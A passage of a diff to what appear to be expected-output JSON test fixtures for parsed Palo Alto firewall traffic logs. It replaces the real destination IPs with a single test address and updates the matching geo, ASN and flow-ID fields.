 "sequence_number": 32091156,
@@ -7392,8 +7460,8 @@
 ],
 "network": {
 "community_id": [
- "1:Y7iOj20be5Di4rx5iGHLO9k0YoU=",
- "1:445AeHI1LAvb+ii4arRZeLAO4zM="
+ "1:2lliaquecBpJntSuQ7PijiL4QZk=",
+ "1:8KuHdx0uKJL3qlKce34DQ08Axak="
 ],
 "transport": "udp",
 "application": "dns",
@@ -7433,14 +7501,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "8.8.8.8",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:40:05.941946085Z",
- "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031673100Z",
+ "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:45.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -7463,27 +7531,29 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 15169,
+ "number": 4837,
 "organization": {
- "name": "Google LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 53,
 "bytes": 90,
- "ip": "8.8.8.8",
+ "ip": "175.16.199.1",
 "packets": 1
 },
 "rule": {
@@ -7502,7 +7572,7 @@
 "packets": 1,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "panw": {
 "panos": {
 "device_group_hierarchy4": "0",
@@ -7517,7 +7587,7 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 }
 },
 "endreason": "aged-out",
@@ -7539,7 +7609,7 @@
 "device_group_hierarchy3": "0",
 "network": {
 "nat": {
- "community_id": "1:+5KwsEYW+tFecEENSBwHbKTvUv8="
+ "community_id": "1:QACuXO9c1p5aQqviOZwhIBygbzg="
 }
 },
 "sequence_number": 32091157,
@@ -7559,8 +7629,8 @@
 ],
 "network": {
 "community_id": [
- "1:8HlDMcJ2vfYtzQNW4/YDX7avDu8=",
- "1:+5KwsEYW+tFecEENSBwHbKTvUv8="
+ "1:2lDBZAbLgBaDEDnigTknsVKKmwI=",
+ "1:QACuXO9c1p5aQqviOZwhIBygbzg="
 ],
 "transport": "udp",
 "application": "dns",
@@ -7600,14 +7670,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "8.8.8.8",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:40:05.941949603Z",
- "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031678400Z",
+ "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:45.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -7630,30 +7700,29 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "100.24.165.74"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "city_name": "Ashburn",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Virginia",
+ "region_name": "Jilin",
 "location": {
- "lon": -77.4728,
- "lat": 39.0481
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 14618,
+ "number": 4837,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 443,
 "bytes": 6669,
- "ip": "100.24.165.74",
+ "ip": "175.16.199.1",
 "packets": 13
 },
 "rule": {
@@ -7672,7 +7741,7 @@
 "packets": 17,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,100.24.165.74,192.168.1.63,100.24.165.74,new_outbound_from_trust,,,ssl,vsys1,untrust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24314,1,52503,443,53168,443,0x400053,tcp,allow,9400,2731,6669,30,2018/11/30 16:09:21,6,business-and-economy,0,32091158,0x0,192.168.0.0-192.168.255.255,United States,0,17,13,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,untrust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24314,1,52503,443,53168,443,0x400053,tcp,allow,9400,2731,6669,30,2018/11/30 16:09:21,6,business-and-economy,0,32091158,0x0,192.168.0.0-192.168.255.255,United States,0,17,13,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "panw": {
 "panos": {
 "device_group_hierarchy4": "0",
@@ -7687,7 +7756,7 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "100.24.165.74"
+ "ip": "175.16.199.1"
 }
 },
 "endreason": "tcp-rst-from-client",
@@ -7709,7 +7778,7 @@
 "device_group_hierarchy3": "0",
 "network": {
 "nat": {
- "community_id": "1:DRqq/mx90TOYq1a5yLf562kwIvc="
+ "community_id": "1:L1IS8Gq8v09nM/4oLFycf+iVo7Q="
 }
 },
 "sequence_number": 32091158,
@@ -7729,8 +7798,8 @@
 ],
 "network": {
 "community_id": [
- "1:dDqHJ1Y91GSM0iyiXXbBnOasVJM=",
- "1:DRqq/mx90TOYq1a5yLf562kwIvc="
+ "1:hLaHl+74+HjUILM+SmXuyrxDwdA=",
+ "1:L1IS8Gq8v09nM/4oLFycf+iVo7Q="
 ],
 "transport": "tcp",
 "application": "ssl",
@@ -7770,14 +7839,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "100.24.165.74",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 6000000000,
- "ingested": "2021-09-08T12:40:05.941953158Z",
- "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,100.24.165.74,192.168.1.63,100.24.165.74,new_outbound_from_trust,,,ssl,vsys1,untrust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24314,1,52503,443,53168,443,0x400053,tcp,allow,9400,2731,6669,30,2018/11/30 16:09:21,6,business-and-economy,0,32091158,0x0,192.168.0.0-192.168.255.255,United States,0,17,13,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031683900Z",
+ "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,untrust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24314,1,52503,443,53168,443,0x400053,tcp,allow,9400,2731,6669,30,2018/11/30 16:09:21,6,business-and-economy,0,32091158,0x0,192.168.0.0-192.168.255.255,United States,0,17,13,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:45.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -7800,27 +7869,29 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "184.51.252.247"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 16625,
+ "number": 4837,
 "organization": {
- "name": "Akamai Technologies, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 443,
 "bytes": 661,
- "ip": "184.51.252.247",
+ "ip": "175.16.199.1",
 "packets": 7
 },
 "rule": {
@@ -7839,7 +7910,7 @@
 "packets": 8,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,184.51.252.247,192.168.1.63,184.51.252.247,new_outbound_from_trust,,,ssl,vsys1,xtrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24204,1,52459,443,28012,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091159,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,xtrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24204,1,52459,443,28012,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091159,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "panw": {
 "panos": {
 "device_group_hierarchy4": "0",
@@ -7854,7 +7925,7 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "184.51.252.247"
+ "ip": "175.16.199.1"
 }
 },
 "endreason": "tcp-rst-from-client",
@@ -7876,7 +7947,7 @@
 "device_group_hierarchy3": "0",
 "network": {
 "nat": {
- "community_id": "1:vx03vuDn4sh2/e89Lm3RoSpVIVM="
+ "community_id": "1:vEitYeyF8bJL6Pi+vgkJHZyK3tQ="
 }
 },
 "sequence_number": 32091159,
@@ -7896,8 +7967,8 @@
 ],
 "network": {
 "community_id": [
- "1:LeVVxJ/qJ69xMnerDRfh9DhS1wg=",
- "1:vx03vuDn4sh2/e89Lm3RoSpVIVM="
+ "1:LtxRBUlwuZn5CHB4FiQ9BVaNsRQ=",
+ "1:vEitYeyF8bJL6Pi+vgkJHZyK3tQ="
 ],
 "transport": "tcp",
 "application": "ssl",
@@ -7937,14 +8008,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "184.51.252.247",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 13000000000,
- "ingested": "2021-09-08T12:40:05.941956662Z",
- "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,184.51.252.247,192.168.1.63,184.51.252.247,new_outbound_from_trust,,,ssl,vsys1,xtrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24204,1,52459,443,28012,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091159,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031689300Z",
+ "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,xtrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24204,1,52459,443,28012,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091159,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:45.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -7967,25 +8038,29 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "35.201.94.140"
+ "ip": "175.16.199.1"
 },
 "geo": {
 "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "Asia Pacific Region",
+ "region_name": "Jilin",
 "location": {
- "lon": 105.0,
- "lat": 35.0
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 15169,
+ "number": 4837,
 "organization": {
- "name": "Google LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 443,
 "bytes": 11136,
- "ip": "35.201.94.140",
+ "ip": "175.16.199.1",
 "packets": 16
 },
 "rule": {
@@ -8004,7 +8079,7 @@
 "packets": 15,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,35.201.94.140,192.168.1.63,35.201.94.140,new_outbound_from_trust,,,ssl,vsys1,trust,xuntrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24234,1,52483,443,16050,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091160,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,xuntrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24234,1,52483,443,16050,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091160,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "panw": {
 "panos": {
 "device_group_hierarchy4": "0",
@@ -8019,7 +8094,7 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "35.201.94.140"
+ "ip": "175.16.199.1"
 }
 },
 "endreason": "tcp-fin",
@@ -8041,7 +8116,7 @@
 "device_group_hierarchy3": "0",
 "network": {
 "nat": {
- "community_id": "1:u1uvQ3wfJoaG/nNiBhvQMHQSVlU="
+ "community_id": "1:lfS/LUe+Z+UcduOHVTp1yk5QK/s="
 }
 },
 "sequence_number": 32091160,
@@ -8061,8 +8136,8 @@
 ],
 "network": {
 "community_id": [
- "1:b6jBmvbfVzb1LGTW2RD80kK1rMs=",
- "1:u1uvQ3wfJoaG/nNiBhvQMHQSVlU="
+ "1:zJ4K4fy0UYUM5GypnCl8lDxoN70=",
+ "1:lfS/LUe+Z+UcduOHVTp1yk5QK/s="
 ],
 "transport": "tcp",
 "application": "ssl",
@@ -8102,14 +8177,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "35.201.94.140",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 8000000000,
- "ingested": "2021-09-08T12:40:05.941960215Z",
- "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.201.94.140,192.168.1.63,35.201.94.140,new_outbound_from_trust,,,ssl,vsys1,trust,xuntrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24234,1,52483,443,16050,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091160,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031694700Z",
+ "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,xuntrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24234,1,52483,443,16050,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091160,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:45.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -8132,27 +8207,29 @@
 "destination": {
 "nat": {
 "port": 0,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 15169,
+ "number": 4837,
 "organization": {
- "name": "Google LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 0,
 "bytes": 588,
- "ip": "8.8.8.8",
+ "ip": "175.16.199.1",
 "packets": 6
 },
 "rule": {
@@ -8171,7 +8248,7 @@
 "packets": 6,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "panw": {
 "panos": {
 "device_group_hierarchy4": "0",
@@ -8186,7 +8263,7 @@
 "destination": {
 "nat": {
 "port": 0,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 }
 },
 "endreason": "aged-out",
@@ -8258,14 +8335,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "8.8.8.8",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:40:05.941963755Z",
- "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031700100Z",
+ "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:46.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -8288,27 +8365,29 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 15169,
+ "number": 4837,
 "organization": {
- "name": "Google LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 53,
 "bytes": 144,
- "ip": "8.8.8.8",
+ "ip": "175.16.199.1",
 "packets": 1
 },
 "rule": {
@@ -8327,7 +8406,7 @@
 "packets": 1,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "panw": {
 "panos": {
 "device_group_hierarchy4": "0",
@@ -8342,7 +8421,7 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 }
 },
 "endreason": "aged-out",
@@ -8364,7 +8443,7 @@
 "device_group_hierarchy3": "0",
 "network": {
 "nat": {
- "community_id": "1:lz0ZCL4R4wwyqmvefpkiJk7yR18="
+ "community_id": "1:YBygWfVh+uJolv6zNydx888KbBc="
 }
 },
 "sequence_number": 32091162,
@@ -8384,8 +8463,8 @@
 ],
 "network": {
 "community_id": [
- "1:jK1/samUe1w5J1uVlmH7SIXX1YE=",
- "1:lz0ZCL4R4wwyqmvefpkiJk7yR18="
+ "1:v3ioLfu0OhYbpmhlhNN2kLb6irc=",
+ "1:YBygWfVh+uJolv6zNydx888KbBc="
 ],
 "transport": "udp",
 "application": "dns",
@@ -8425,14 +8504,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "8.8.8.8",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "duration": 0,
- "ingested": "2021-09-08T12:40:05.941967352Z",
- "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "ingested": "2021-12-09T13:44:05.031705300Z",
+ "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:46.000-05:00",
 "timezone": "America/New_York",
 "kind": "event",
@@ -8455,27 +8534,29 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 125.3228,
+ "lat": 43.88
+ }
 },
 "as": {
- "number": 15169,
+ "number": 4837,
 "organization": {
- "name": "Google LLC"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 53,
 "bytes": 206,
- "ip": "8.8.8.8",
+ "ip": "175.16.199.1",
 "packets": 1
 },
 "rule": {
@@ -8494,7 +8575,7 @@
 "packets": 1,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "panw": {
 "panos": {
 "device_group_hierarchy4": "0",
@@ -8509,7 +8590,7 @@
 "destination": {
 "nat": {
 "port": 53,
- "ip": "8.8.8.8"
+ "ip": "175.16.199.1"
 }
 },
 "endreason": "aged-out",
@@ -8531,7 +8612,7 @@
 "device_group_hierarchy3": "0",
 "network": {
 "nat": {
- "community_id": "1:DkOVz0BGrlh9OPZZ8+58eugW7gU="
